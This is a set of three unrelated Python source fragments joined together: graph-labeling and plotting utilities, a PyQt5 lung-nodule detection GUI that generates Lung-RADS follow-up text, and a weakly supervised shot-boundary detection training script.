        Advances in Neural Information Processing Systems 29 (NIPS). 2016.
    """
    niter=1
    final_graph=nx.Graph(graph)
    # Work on an integer-relabeled copy so labels can be indexed positionally.
    graph_relabel,inv_relabel_dict_=relabel_graph_order(final_graph)
    l_aux = list(nx.get_node_attributes(graph_relabel,'attr_name').values())
    labels = np.zeros(len(l_aux), dtype=np.int32)
    adjency_list = list([list(x[1].keys()) for x in graph_relabel.adjacency()]) # old-style adjacency list, as in networkx 1.0
    for j in range(len(l_aux)):
        labels[j] = l_aux[j]
    new_labels = copy.deepcopy(l_aux)
    while niter<=h:
        labeled_graph=nx.Graph(final_graph)
        graph_relabel,inv_relabel_dict_=relabel_graph_order(final_graph)
        # Labels of the previous WL iteration live under 'attr_name<k-1>';
        # iteration 1 reads the raw 'attr_name' attributes ('attr_name0' is
        # assumed present — TODO confirm against callers).
        l_aux = list(nx.get_node_attributes(graph_relabel,'attr_name'+str(niter-1)).values())
        adjency_list = list([list(x[1].keys()) for x in graph_relabel.adjacency()]) # old-style adjacency list, as in networkx 1.0
        for v in range(len(adjency_list)):
            # form a multiset label of the node v of the i'th graph
            # and convert it to a string
            prev_neigh=np.sort([labels[adjency_list[v]]][-1])
            long_label = np.concatenate((np.array([[labels[v]][-1]]),prev_neigh))
            long_label_string = ''.join([str(x) for x in long_label])
            new_labels[v] =long_label_string
        labels = np.array(copy.deepcopy(new_labels))
        # Write this iteration's labels back onto the original node names.
        dict_={inv_relabel_dict_[i]:labels[i] for i in range(len(labels))}
        nx.set_node_attributes(labeled_graph,dict_,'attr_name'+str(niter))
        niter+=1
        final_graph=nx.Graph(labeled_graph)
    dict_values={} # NOTE(review): ordering of the concatenated labels here is uncertain — verify
    for k,v in final_graph.nodes().items():
        # Concatenate the labels of every WL iteration, shortest first;
        # optionally hash each one to keep attributes compact.
        hashed=sorted([str(x) for x in v.values()], key=len)
        if tohash :
            dict_values[k]=np.array([hash(x) for x in hashed])
        else:
            dict_values[k]=np.array(hashed)
    graph2=nx.Graph(graph)
    nx.set_node_attributes(graph2,dict_values,'attr_name')
    return graph2
def graph_colors(nx_graph, vmin=0, vmax=7):
    """Map every node's 'attr_name' attribute to an RGBA viridis color.

    The attribute values are normalized into [vmin, vmax] and the colors are
    returned as a list ordered like ``nx_graph.nodes()``.
    """
    normalizer = mcol.Normalize(vmin=vmin, vmax=vmax)
    mapper = cm.ScalarMappable(norm=normalizer, cmap='viridis')
    mapper.set_array([])
    node_to_color = {
        node: mapper.to_rgba(attr)
        for node, attr in nx.get_node_attributes(nx_graph, 'attr_name').items()
    }
    return [node_to_color[node] for node in nx_graph.nodes()]
def draw_rel(G, draw=True, edge_color='g', shiftx=0, shifty=0, return_pos=False, with_labels=True, swipy=False, swipx=False, vmin=0, vmax=7):
    """Lay out ``G`` with the Kamada-Kawai algorithm and draw it.

    Positions may be translated by (shiftx, shifty) and mirrored along either
    axis (swipx/swipy) — note the mirroring only happens when a shift is
    requested, matching the historical behavior. Returns the position dict
    when ``return_pos`` is True.
    """
    pos = nx.kamada_kawai_layout(G)
    if shiftx != 0 or shifty != 0:
        # Translate (and optionally mirror) every node position in place.
        for coords in pos.values():
            if shiftx != 0:
                coords[0] = coords[0] + shiftx
            if shifty != 0:
                coords[1] = coords[1] + shifty
            if swipy:
                coords[1] = -coords[1]
            if swipx:
                coords[0] = -coords[0]
    if with_labels:
        nx.draw(G, pos, with_labels=True, labels=nx.get_node_attributes(G, 'attr_name'))
    else:
        nx.draw(G, pos, with_labels=False, edge_color=edge_color)
    if draw:
        plt.show()
    if return_pos:
        return pos
def draw_transp(G1,G2,transp,shiftx=1,shifty=1,thresh=0.09,swipy=False,swipx=False,vmin=0,vmax=1.01,with_labels=False):
    """Draw two graphs side by side with the transport plan between them.

    ``transp[i, j]`` is read as the mass transported from node i of G1 to
    node j of G2 (row/column indices follow node iteration order); couplings
    above ``thresh`` are drawn as dashed lines whose opacity is proportional
    to the transported mass.
    """
    pos1=draw_rel(G1,draw=False,return_pos=True,vmin=vmin,vmax=vmax,with_labels=with_labels,edge_color='g')
    pos2=draw_rel(G2,draw=False,shiftx=shiftx,shifty=shifty,return_pos=True,swipx=swipx,swipy=swipy,vmin=vmin,vmax=vmax,with_labels=with_labels,edge_color='r')
    def all_matrix_attr(G,return_invd=True):
        # Local helper: map each node name to its row/column index in transp.
        # The 0.5 placeholder feature is unused here; only invd matters.
        d=dict((k, v) for k, v in dict(G.nodes()).items())
        x=[]
        invd={}
        try :
            j=0
            for k,v in d.items():
                x.append(0.5)
                invd[k]=j
                j=j+1
            if return_invd:
                return np.array(x),invd
            else:
                return np.array(x)
        except KeyError:
            raise NoAttrMatrix
    _,invd1=all_matrix_attr(G1)
    _,invd2=all_matrix_attr(G2)
    # One dashed line per coupling above the threshold, faded by mass.
    for k1,v1 in pos1.items():
        for k2,v2 in pos2.items():
            if (transp[invd1[k1],invd2[k2]]>thresh):
                plt.plot([pos1[k1][0], pos2[k2][0]]
                         , [pos1[k1][1], pos2[k2][1]], 'k--'
                         , alpha=transp[invd1[k1],invd2[k2]]/np.max(transp),lw=1)
def random_edge_removal(G, prob, seed=0):
    """Remove each existing edge independently with probability ``prob``.

    The (symmetric) adjacency matrix ``G`` is scanned in row-major
    upper-triangle order and each present edge is dropped on a successful
    i.i.d. Bernoulli(prob) draw. A new matrix is returned; ``G`` itself is
    left untouched.
    """
    np.random.seed(seed)
    pruned = G.copy()
    rows, cols = np.triu_indices(G.shape[0], k=1)
    for r, c in zip(rows, cols):
        # Draw only for existing edges, so the RNG stream matches the
        # historical per-edge sampling order.
        if G[r, c] == 1 and np.random.binomial(n=1, p=prob, size=1)[0] == 1:
            pruned[r, c] = pruned[c, r] = 0
    return pruned
def random_edge_addition(G, prob, seed=0):
    """Insert each missing edge independently with probability ``prob``.

    The (symmetric) adjacency matrix ``G`` is scanned in row-major
    upper-triangle order and each absent edge is added on a successful
    i.i.d. Bernoulli(prob) draw. A new matrix is returned; ``G`` itself is
    left untouched.
    """
    np.random.seed(seed)
    augmented = G.copy()
    rows, cols = np.triu_indices(G.shape[0], k=1)
    for r, c in zip(rows, cols):
        # Draw only for missing edges, so the RNG stream matches the
        # historical per-edge sampling order.
        if G[r, c] == 0 and np.random.binomial(n=1, p=prob, size=1)[0] == 1:
            augmented[r, c] = augmented[c, r] = 1
    return augmented
def random_node_removal(G, prob, seed=0):
    """Delete each node independently with probability ``prob``.

    Every node survives an i.i.d. Bernoulli(1 - prob) draw; the returned
    matrix is the sub-adjacency of ``G`` restricted to the surviving nodes.
    ``G`` itself is not modified.
    """
    np.random.seed(seed)
    newG = G.copy()
    kept = [
        idx for idx in range(G.shape[0])
        if np.random.binomial(n=1, p=(1 - prob), size=1)[0] == 1
    ]
    return newG[kept, :][:, kept]
<filename>src/main.py
from PyQt5.QtWidgets import *
from PyQt5.uic import loadUi
from PyQt5.QtCore import pyqtSlot, Qt
from datetime import datetime
from dateutil.relativedelta import relativedelta
import sys
from detect import detect
import os
from threeD_module import CthreeD
from preferences import Preferences
import qdarkstyle
import json
from faker import Faker
import csv
import joblib
from functools import partial
# Since I use macOS to develop the app and installed NuduleNet on Windows10 to run it,
# feel free to modify it for your own usage.
# Flag for the machine that actually has NoduleNet installed.
use_win10 = False
# JSON file that persists all detection results and app preferences.
pkg_name = 'mac_pkg_copy.json'
if use_win10:
    # NOTE(review): an empty CUDA_VISIBLE_DEVICES hides all GPUs, which
    # presumably forces CPU inference — confirm this is intentional.
    os.environ['CUDA_VISIBLE_DEVICES'] = ''
    import torch
    import argparse
    from config import config
    # NoduleNet's argument parser expects a positional "mode"; inject 'eval'
    # so the GUI can reuse its CLI configuration unchanged.
    sys.argv.append('eval')
    this_module = sys.modules[__name__]
    parser = argparse.ArgumentParser()
    parser.add_argument('--net', '-m', metavar='NET', default=config['net'],
                        help='neural net')
    parser.add_argument("mode", type=str,
                        help="you want to test or val")
    parser.add_argument("--weight", type=str, default=config['initial_checkpoint'],
                        help="path to model weights to be used")
class NoduleCADx(QMainWindow):
    """Main window of the Nodule CADx application.

    Shows a patient list (upper block) and a scan/nodule list (lower block),
    and wires the buttons for loading scans, running detection, displaying a
    3D view, and exporting a CSV report. All persistent state lives in the
    JSON file named by the module-level ``pkg_name``.
    """
    def __init__(self):
        super().__init__()
        loadUi('mainwindow.ui', self)
        self.setWindowFlags(Qt.WindowMaximizeButtonHint | Qt.WindowMinimizeButtonHint | Qt.WindowCloseButtonHint)
        self.display_dialog = None
        # ColumnWidth of Patient List
        self.treeWidget.setColumnWidth(0, 70)
        self.treeWidget.setColumnWidth(1, 100)
        self.treeWidget.setColumnWidth(2, 100)
        self.treeWidget.setColumnWidth(3, 50)
        self.treeWidget.setColumnWidth(4, 50)
        # ColumnWidth of Scan and Nodule List
        self.noduletreeWidget.setColumnWidth(0, 70)
        self.noduletreeWidget.setColumnWidth(1, 100)
        self.noduletreeWidget.setColumnWidth(2, 100)
        self.noduletreeWidget.setColumnWidth(3, 50)
        self.noduletreeWidget.setColumnWidth(4, 100)
        self.noduletreeWidget.setColumnWidth(5, 100)
        self.noduletreeWidget.setColumnWidth(6, 100)
        self.noduletreeWidget.setColumnWidth(7, 100)
        self.noduletreeWidget.setColumnWidth(8, 100)
        self.preferences_dialog = None
        # pkg_name is the JSON file saved all the detected information (including scan path)
        # create a pkg_name.json if it doesn't exist.
        if not os.path.exists(pkg_name):
            with open(pkg_name, 'w') as json_file:
                initial_json = {'app': 'Nodule CADx', 'version': '1.0.0', "preferences":
                                {"threshold": "0.8",
                                 "project_directory": os.getcwd(),
                                 "automatic_classification": True,
                                 "windowlevel": "?"}, 'members': []}
                json.dump(initial_json, json_file, indent=2)
        # load pkg_name.json
        with open(pkg_name, 'r') as f:
            self.data = json.load(f)
        # load nodulenet and classification model and refresh patient list.
        self.nodulenet_model = None
        self.classification_model = None
        self.load_model()
        self.refresh_patient_list()

    def load_model(self):
        """
        Load (1)NoduleNet and (2)Classification model.
        Since I didn't install NoduleNet on my macOS, so only load it on Windows10.
        """
        # NoduleNet model
        if use_win10:
            args = parser.parse_args()
            initial_checkpoint = args.weight
            net = args.net
            # Resolve the network class by name from this module's namespace.
            net = getattr(this_module, net)(config)
            if initial_checkpoint:
                print('[Loading model from %s]' % initial_checkpoint)
                checkpoint = torch.load(initial_checkpoint, map_location='cpu')
                net.load_state_dict(checkpoint['state_dict'], )
            else:
                print('No model weight file specified')
            net.set_mode('eval')
            net.use_mask = True
            net.use_rcnn = True
            self.nodulenet_model = net
        else:
            self.nodulenet_model = None
        # Classification model
        self.classification_model = joblib.load('model/classification_model.pkl')

    @pyqtSlot()
    def on_reportButton_clicked(self):
        """
        Export system report in CSV format.
        """
        report = [['Name', 'Date of Birth', 'Sex', 'Final-Score', 'Management', 'Scan Path', 'Nodule', 'Diameter',
                   'Type', 'Calcification', 'Spiculation', 'Perifissural', 'Endobronchial', 'Score']]
        for m in self.data['members']:
            report.append([m['patient_name'], m['date_of_birth'], m['sex'], m['score'], m['management']])
            for s in m['scans']:
                report.append(['']*5 + [s['scan_path']])
                for i, n in enumerate(s['nodules'], start=1):
                    type_name = self.get_type_name(n['type'])
                    report.append(['']*6 + [f'Nodule{i}', n['diameter'], type_name, n['calcification'],
                                            n['spiculation'], n['perifissural'], n['endobronchial'], n['score']])
        # newline='' is required by the csv module; without it the file gets
        # blank rows on Windows.
        with open('report.csv', 'w', newline='') as csvfile:
            writer = csv.writer(csvfile)
            writer.writerows(report)

    @staticmethod
    def get_type_name(nodule_type):
        """
        Get type name for display. Returns None for unknown codes, matching
        the historical if/elif fall-through.
        """
        return {'1': 'non-solid',
                '2': 'non/part',
                '3': 'part-solid',
                '4': 'part/solid',
                '5': 'solid'}.get(nodule_type)

    def refresh_patient_list(self):
        """
        refresh patient list (upper block of main window).
        """
        self.treeWidget.clear()
        for m in self.data['members']:
            # First column is a check/cross mark for the 'updated' flag.
            scan_item = QTreeWidgetItem(self.treeWidget,
                                        ['\u2713' if m['updated'] else '\u2717', m['patient_name'], m['date_of_birth'],
                                         m['sex'], m['score'], m['management']])
            for i in range(scan_item.columnCount()):
                scan_item.setTextAlignment(i, Qt.AlignHCenter)

    def refresh_scan_list(self, member):
        """
        refresh scan and nodule list (lower block of main window).
        """
        self.noduletreeWidget.clear()
        for scan in member['scans']:
            p = QTreeWidgetItem(self.noduletreeWidget, ['\u2713' if scan['updated'] else '\u2717', scan['scan_date'],
                                                        scan['scan_path']])
            if scan['updated']:
                # One child row per detected nodule.
                for count, nodule in enumerate(scan['nodules'], start=1):
                    type_name = self.get_type_name(nodule['type'])
                    n_item = QTreeWidgetItem(p, ['', '', f'Nodule{count}', str(nodule['prob']), str(nodule['diameter']),
                                                 type_name, str(nodule['calcification']), str(nodule['spiculation']),
                                                 str(nodule['perifissural']), str(nodule['endobronchial']),
                                                 nodule['score']])
                    for i in range(n_item.columnCount()):
                        n_item.setTextAlignment(i, Qt.AlignHCenter)
            for i in range(p.columnCount()):
                p.setTextAlignment(i, Qt.AlignHCenter)
        self.noduletreeWidget.expandAll()

    @pyqtSlot()
    def on_actionPreferences_triggered(self):
        # Lazily create the dialog once; it writes back on close (rejected).
        if not self.preferences_dialog:
            self.preferences_dialog = Preferences(self.data['preferences'])
            self.preferences_dialog.rejected.connect(self.update_preferences)
        self.preferences_dialog.show()

    def update_preferences(self):
        """
        update preferences when OK in preferences dialog is clicked.
        """
        self.data['preferences'] = self.preferences_dialog.preferences

    def on_treeWidget_itemClicked(self):
        index_member = self.treeWidget.currentIndex().row()
        self.refresh_scan_list(member=self.data['members'][index_member])

    @pyqtSlot()
    def on_loadscanButton_clicked(self):
        """Load a scan file and attach it to a (possibly new) patient."""
        fname, _filter = QFileDialog.getOpenFileName(self, 'open file', '~/Desktop', 'Scan (*.mhd *.nrrd)')
        # make up some patient information for .mhd file from LUNA16
        faker = Faker()
        patient_name = faker.name()
        birth_date = faker.date()
        patient_sex = faker.profile()['sex']
        scan_date = faker.date()
        # For general DICOM series
        '''
        reader = sitk.ImageSeriesReader()
        reader = sitk.ImageSeriesReader()
        dir = '/Users/apple/Desktop/神農/一些參考/Patient CT EDU (Anonym-TR123)'
        seriesIDs = reader.GetGDCMSeriesIDs(dir)
        dcm_series = reader.GetGDCMSeriesFileNames(dir, seriesIDs[0])
        reader.SetFileNames(dcm_series)
        reader.MetaDataDictionaryArrayUpdateOn()
        # Execute() is needed to GetMetaData
        img = reader.Execute()
        patient_name = reader.GetMetaData(0,'0010|0010').strip()
        birth_date = reader.GetMetaData(0,'0010|0030').strip()
        patient_sex = reader.GetMetaData(0,'0010|0040').strip()
        '''
        # Append the scan to an existing patient, else create a new one.
        exist = False
        for i, m in enumerate(self.data['members']):
            if patient_name == m['patient_name']:
                self.data['members'][i]['scans'].append({'updated': False, 'scan_path': fname,
                                                         'scan_date': scan_date, 'nodules': []})
                self.data['members'][i]['updated'] = False
                exist = True
        if not exist:
            self.data['members'].append(
                {'updated': False, 'patient_name': patient_name, 'date_of_birth': birth_date, 'sex': patient_sex,
                 'score': '?', 'management': '?', 'scans': [{'updated': False, 'scan_path': fname,
                                                             'scan_date': scan_date, 'nodules': []}]})
        self.refresh_patient_list()

    @pyqtSlot()
    def on_displayButton_clicked(self):
        """Open the 3D display dialog for the selected scan (and nodule)."""
        index_member = self.treeWidget.currentIndex().row()
        nodule_select = None
        # A selected item with a parent is a nodule row; otherwise a scan row.
        if self.noduletreeWidget.selectedItems()[0].parent():
            directory = self.noduletreeWidget.selectedItems()[0].parent().text(2)
            nodule_select = self.noduletreeWidget.currentIndex().row()
            index_scan = self.noduletreeWidget.indexFromItem(self.noduletreeWidget.selectedItems()[0].parent()).row()
        else:
            directory = self.noduletreeWidget.selectedItems()[0].text(2)
            index_scan = self.noduletreeWidget.indexFromItem(self.noduletreeWidget.selectedItems()[0]).row()
        self.display_dialog = CthreeD()
        self.display_dialog.updata_data_signal.connect(partial(self.update_data, index_member, index_scan))
        self.display_dialog.show()
        self.display_dialog.w = self.display_dialog.imgLabel_1.width()
        self.display_dialog.h = self.display_dialog.imgLabel_1.height()
        self.display_dialog.load_dicomfile(directory=directory, nodule_select=nodule_select,
                                           scan=self.data['members'][index_member]['scans'][index_scan])

    def update_data(self, index_member, index_scan, data_csv):
        """Replace the nodule rows of one scan and refresh the views."""
        self.data['members'][index_member]['scans'][index_scan]['nodules'] = []
        for row in data_csv:
            self.data['members'][index_member]['scans'][index_scan]['nodules'].append(row)
        self.refresh_scan_list(member=self.data['members'][index_member])
        self.management(index_member)

    def mousePressEvent(self, event):
        # NOTE(review): relies on the module-level `app` created in the
        # __main__ guard; clicking the window steals focus back to it.
        if app.focusWidget():
            self.setFocus()

    # TODO Not complete enough
    def management(self, index_member=None):
        """
        Get highest Lung-RADS score and match the date to show management
        """
        # diameter for solid component is needed for class 4 if nodule type is part-solid
        scores = []
        scans_date = []
        max_solid_component_diameter = 0
        for s in self.data['members'][index_member]['scans']:
            y, m, d = s['scan_date'].split(sep='-')
            scans_date.append(datetime(int(y), int(m), int(d)))
            for n in s['nodules']:
                scores.append(n['score'])
                if n['type'] == '3':
                    # float() replaces the original eval(): diameters are
                    # numeric strings, and eval on stored data is unsafe.
                    if float(n['diameter']) * 0.5 > max_solid_component_diameter:
                        max_solid_component_diameter = float(n['diameter']) * 0.5
        # The most recent scan date drives the follow-up interval below.
        newest = datetime(1000, 1, 1)
        for scan_date in scans_date:
            if scan_date > newest:
                newest = scan_date
        management = ''
        if '?' in scores:
            max_score = '?'
            management = '?'
        else:
            breaker = False
            max_score = '0'
            # Walk scores from most to least severe; the first match wins.
            for s in ['4X', '4B', '4A', '3', '2', '1', '0']:
                if not scores:
                    print('no nodule')
                    max_score = '1'
                    break
                for score in scores:
                    if score == s:
                        max_score = s
                        breaker = True
                        break
                if breaker:
                    break
        if max_score == '0':
            management = 'Additional lung cancer screening CT images and/or comparison to ' \
                         'prior chest CT examinations is needed'
        elif max_score == '1' or max_score == '2':
            management = f'LDCT @ {newest.date()+relativedelta(years=1)}'
        elif max_score == '3':
            management = f'LDCT @ {newest.date()+relativedelta(months=6)}'
        elif max_score == '4A':
            management = f'LDCT @ {newest.date()+relativedelta(months=3)}'
            if max_solid_component_diameter >= 8:
                management += ' (PET/CT may be used)'
        elif max_score == '4B' or max_score == '4X':
            management = f'Chest CT w/ or w/o contrast, PET/CT and/or tissue sampling may be used'
            # TODO: only needed when a new large nodule appears
            # management += '1 month LDCT may be recommended to
            # address potentially infectious or inflammatory conditions'
        self.data['members'][index_member]['score'] = max_score
        self.data['members'][index_member]['management'] = management
        self.refresh_patient_list()

    @pyqtSlot()
    def on_detectButton_clicked(self):
        """Run nodule detection on the selected scan and store the results."""
        # show status on statusbar
        self.statusBar().showMessage('Model predicting, please wait for a while ...')
        self.statusBar().repaint()
        QApplication.instance().processEvents()
        # TODO Check if selected scan is already detected
        index_member = self.treeWidget.currentIndex().row()
        index_scan = self.noduletreeWidget.currentIndex().row()
        if use_win10:
            csv_data = detect(self.data['members'][index_member]['scans'][index_scan]['scan_path'],
                              self.nodulenet_model, self.classification_model, self.data['preferences'])
        else:
            csv_data = None
        self.update_data(index_member, index_scan, csv_data)
        self.data['members'][index_member]['scans'][index_scan]['updated'] = True
        self.refresh_scan_list(self.data['members'][index_member])
        # A patient is "updated" only once every scan has been detected.
        status = [scan['updated'] for scan in self.data['members'][index_member]['scans']]
        if False not in status:
            self.data['members'][index_member]['updated'] = True
            self.refresh_patient_list()
        self.statusBar().showMessage('Done.', msecs=5000)
        self.management(index_member)

    @pyqtSlot()
    def on_savechangesButton_clicked(self):
        """Persist the in-memory state to the JSON package after confirmation."""
        messagebox = QMessageBox.warning(self, 'Are you sure you want to save changes?',
                                         'You cannot undo this action, re-detect scans if necessary.',
                                         QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)
        if messagebox == QMessageBox.Ok:
            with open(pkg_name, 'w') as json_file:
                json.dump(self.data, json_file, indent=2)
if __name__ == '__main__':
    # Standard Qt bootstrap: one QApplication, dark stylesheet, main window.
    # NOTE(review): `app` must stay module-global — NoduleCADx.mousePressEvent
    # reads it directly.
    app = QApplication(sys.argv)
    app.setStyleSheet(qdarkstyle.load_stylesheet(qt_api='pyqt5'))
    window = NoduleCADx()
    window.show()
    sys.exit(app.exec_())
|
import random
from esper.prelude import *
from rekall.video_interval_collection import VideoIntervalCollection
from rekall.temporal_predicates import *
from esper.rekall import *
import cv2
import pickle
import multiprocessing as mp
from query.models import Video, Shot
from tqdm import tqdm
import django
import sys
import os
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
from torch import optim
from torch.optim import lr_scheduler
from collections import OrderedDict
import esper.shot_detection_torch.models.deepsbd_resnet as deepsbd_resnet
import esper.shot_detection_torch.models.deepsbd_alexnet as deepsbd_alexnet
import esper.shot_detection_torch.dataloaders.movies_deepsbd as movies_deepsbd_data
# Which training split to use; exactly one of the options below.
# TRAINING_SET = 'kfolds'
# TRAINING_SET = '400_min'
TRAINING_SET = '4000_min'
# TRAINING_SET = '40000_min'
# TRAINING_SET = 'all_movies'
# TRAINING_SET = 'ground_truth'
# WEAK_LABELS_PATH = '/app/data/shot_detection_weak_labels/majority_vote_labels_all_windows_downsampled.npy'
# MODEL_SAVE_PATH = '/app/notebooks/learning/models/deepsbd_resnet_train_on_4000_min_majority_vote_downsampled'
WEAK_LABELS_PATH = sys.argv[1]
MODEL_SAVE_PATH = sys.argv[2]
if TRAINING_SET != 'ground_truth' and not os.path.exists(WEAK_LABELS_PATH):
    # BUGFIX: this message used to be a bare string expression (a no-op), so
    # a missing weak-labels file was silently ignored; fail fast instead.
    raise FileNotFoundError("Weak labels path {} does not exist".format(WEAK_LABELS_PATH))
if not os.path.exists(MODEL_SAVE_PATH):
    os.makedirs(MODEL_SAVE_PATH)
# Data, checkpoint and split locations.
LOCAL_PATH = '/app/data'
PRETRAIN_PATH = '/app/notebooks/learning/models/resnet-18-kinetics.pth'
FOLDS_PATH = '/app/data/shot_detection_folds.pkl'
SEGS_400_MIN_PATH = '/app/data/400_minute_train.pkl'
SEGS_4000_MIN_PATH = '/app/data/4000_minute_train.pkl'
SEGS_40000_MIN_PATH = '/app/data/40000_minute_train.pkl'
SEGS_ALL_VIDEOS_PATH = '/app/data/all_videos_train.pkl'
VAL_WINDOWS = '/app/data/shot_detection_weak_labels/validation_windows_same_val_test.pkl'
TEST_WINDOWS = '/app/data/shot_detection_weak_labels/test_windows_same_val_test.pkl'
Y_VAL = '/app/data/shot_detection_weak_labels/Y_val_windows_downsampled_same_val_test.npy'
Y_TEST = '/app/data/shot_detection_weak_labels/Y_test_windows_downsampled_same_val_test.npy'
# only works for 400_min, 4000_min, all_movies
CONTINUE_PATH = None
# CONTINUE_PATH = '/app/notebooks/learning/models/deepsbd_resnet_train_on_40000_min_weak/fold1_270000_iteration.pth'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print('Initialized constants')
# load folds from disk
with open(FOLDS_PATH, 'rb') as f:
    folds = pickle.load(f)
# Load DeepSBD datasets for each fold. This is used for testing.
deepsbd_datasets_weak_testing = []
for fold in folds:
    # Hand-labeled ('manual') ground-truth shots for the videos in this fold.
    shots_in_fold_qs = Shot.objects.filter(
        labeler__name__contains='manual',
        video_id__in = fold
    )
    shots_in_fold = VideoIntervalCollection.from_django_qs(shots_in_fold_qs)
    data = movies_deepsbd_data.DeepSBDDataset(shots_in_fold, verbose=True,
                                             preload=False, logits=True,
                                             local_path=LOCAL_PATH)
    deepsbd_datasets_weak_testing.append(data)
print('Loaded test data')
# load weak labels
if TRAINING_SET != 'ground_truth':
    with open(WEAK_LABELS_PATH, 'rb') as f:
        weak_labels_windows = np.load(f)
    print('Loaded weak labels from disk')
    # Group rows by video id. NOTE(review): `collect` and `np` come from the
    # star-import of esper.prelude; rows look like
    # ((video_id, start, end), payload) — confirm against the labeling code.
    weak_labels_collected = collect(
        weak_labels_windows,
        lambda row: row[0][0]
    )
    # Rebuild the (start, end, payload) intervals per video.
    weak_labels_col = VideoIntervalCollection({
        video_id: [
            (row[0][1] ,row[0][2], row[1])
            for row in weak_labels_collected[video_id]
        ]
        for video_id in tqdm(list(weak_labels_collected.keys()))
    })
    print('Finished collecting weak labels')
def weak_payload_to_logits(weak_payload):
    """Expand a 2-element weak-label payload into a 3-element logits tuple.

    The two payload entries are swapped around a constant middle logit of
    0.0: (a, b) -> (b, 0., a).
    """
    first, second = weak_payload[0], weak_payload[1]
    return (second, 0., first)
# Build the training datasets for the selected TRAINING_SET. Each branch
# produces `deepsbd_datasets_weak_training`, a list of DeepSBD datasets.
if TRAINING_SET == 'kfolds':
    # One training dataset per fold: ground-truth shot windows, re-labeled
    # by joining against the weak-label windows.
    deepsbd_datasets_weak_training = []
    for fold in folds:
        shots_in_fold_qs = Shot.objects.filter(
            labeler__name__contains='manual',
            video_id__in = fold
        )
        shots_in_fold = VideoIntervalCollection.from_django_qs(shots_in_fold_qs)
        data = movies_deepsbd_data.DeepSBDDataset(shots_in_fold, verbose=True,
                                                 preload=False, logits=True,
                                                 local_path=LOCAL_PATH)
        # Re-index the dataset items by video id so they can be joined
        # against the weak-label windows.
        items_collected = collect(
            data.items,
            lambda item: item[0]
        )
        items_col = VideoIntervalCollection({
            video_id: [
                (item[1], item[2], (item[3], item[4]))
                for item in items_collected[video_id]
            ]
            for video_id in items_collected
        })
        # Exact-span join: keep the weak label's payload, carry over the
        # clip path stored in the dataset item's payload.
        new_items = weak_labels_col.join(
            items_col,
            predicate=equal(),
            working_window=1,
            merge_op = lambda weak, item: [
                (weak.start, weak.end, (weak.payload, item.payload[1]))
            ]
        )
        # Rewrite dataset items as (video_id, start, end, logits, path).
        data.items = [
            (video_id, intrvl.start, intrvl.end, weak_payload_to_logits(intrvl.payload[0]), intrvl.payload[1])
            for video_id in sorted(list(new_items.get_allintervals().keys()))
            for intrvl in new_items.get_intervallist(video_id).get_intervals()
        ]
        deepsbd_datasets_weak_training.append(data)
elif TRAINING_SET in ['400_min', '4000_min', '40000_min', 'all_movies']:
    # Single training dataset built from the pre-computed segment pickles.
    with open(SEGS_400_MIN_PATH if TRAINING_SET == '400_min'
              else SEGS_4000_MIN_PATH if TRAINING_SET == '4000_min'
              else SEGS_40000_MIN_PATH if TRAINING_SET == '40000_min'
              else SEGS_ALL_VIDEOS_PATH,
              'rb') as f:
        segments = VideoIntervalCollection(pickle.load(f))
    print('Creating dataset')
    data = movies_deepsbd_data.DeepSBDDataset(segments, verbose=True,
                                             preload=False, logits=True,
                                             local_path=LOCAL_PATH, stride=16)
    print('Collecting')
    items_collected = collect(
        data.items,
        lambda item: item[0]
    )
    print('Recreating VIC')
    items_col = VideoIntervalCollection({
        video_id: [
            (item[1], item[2], (item[3], item[4]))
            for item in items_collected[video_id]
        ]
        for video_id in tqdm(items_collected)
    })
    print('Creating new items')
    # Same exact-span join against the weak labels as the kfolds branch.
    new_items = weak_labels_col.join(
        items_col,
        predicate=equal(),
        working_window=1,
        merge_op = lambda weak, item: [
            (weak.start, weak.end, (weak.payload, item.payload[1]))
        ]
    )
    data.items = [
        (video_id, intrvl.start, intrvl.end, weak_payload_to_logits(intrvl.payload[0]), intrvl.payload[1])
        for video_id in sorted(list(new_items.get_allintervals().keys()))
        for intrvl in new_items.get_intervallist(video_id).get_intervals()
    ]
    deepsbd_datasets_weak_training = [data]
elif TRAINING_SET == 'ground_truth':
    # Load DeepSBD datasets for validaton.
    # Use validation for training.
    # Split by folds
    deepsbd_datasets_weak_training = []
    with open(VAL_WINDOWS, 'rb') as f:
        val_windows_by_video_id = pickle.load(f)
    with open(Y_VAL, 'rb') as f:
        Y_val = np.load(f)
    # Resolve each video id to its file path once.
    paths = {
        video_id: Video.objects.get(id=video_id).path
        for video_id in list(set([
            vid for vid, start, end in val_windows_by_video_id
        ]))
    }
    def val_to_logits(val):
        """ If val is 1, positive; if val is 2, negative """
        return (0, 0, 1) if val == 1 else (1, 0, 0)
    shots = VideoIntervalCollection.from_django_qs(Shot.objects.filter(
        labeler__name__contains="manual"
    ))
    for fold in folds:
        # Keep only the validation windows whose video belongs to this fold.
        data_val = movies_deepsbd_data.DeepSBDDataset(shots, verbose=True,
            preload=False, logits=True, local_path=LOCAL_PATH, stride=16)
        data_val.set_items([
            (video_id, start, end, val_to_logits(label), paths[video_id])
            for (video_id, start, end), label in zip(val_windows_by_video_id, Y_val) if video_id in fold
        ])
        deepsbd_datasets_weak_training.append(data_val)
print('Finished constructing datasets')
# dataset to hold multiple folds for weak data
class DeepSBDWeakTrainDataset(Dataset):
    """Concatenation of several DeepSBD datasets into one indexable dataset.

    Each constituent dataset must expose ``__len__``/``__getitem__`` and an
    ``items`` list of ``(video_id, start, end, logits, path)`` tuples, where
    ``logits`` is a per-class tuple (e.g. ``(1, 0, 0)``).
    """

    def __init__(self, datasets):
        # List of constituent datasets; indexing is the concatenation of
        # their index spaces, in order.
        self.datasets = datasets

    def __len__(self):
        return sum(len(d) for d in self.datasets)

    def __getitem__(self, idx):
        # Map the flat index onto the constituent datasets in order.
        for d in self.datasets:
            if idx < len(d):
                return d[idx]
            idx -= len(d)
        # Out-of-range: preserved original behavior (returns None rather
        # than raising IndexError; samplers never exceed len(self)).
        return None

    def weights_for_balanced_classes(self):
        """Return one weight per sample, inversely proportional to the
        frequency of that sample's class, for WeightedRandomSampler."""
        labels = [
            np.argmax(item[3])
            for d in self.datasets
            for item in d.items
        ]
        # Bug fix: size the count table by the number of classes (length of
        # the logits tuple item[3]), not by the length of the whole item
        # tuple as before (which counted 5 fields instead of 3 classes).
        num_classes = len(self.datasets[0].items[0][3])
        class_counts = [0] * num_classes
        for label in labels:
            class_counts[label] += 1
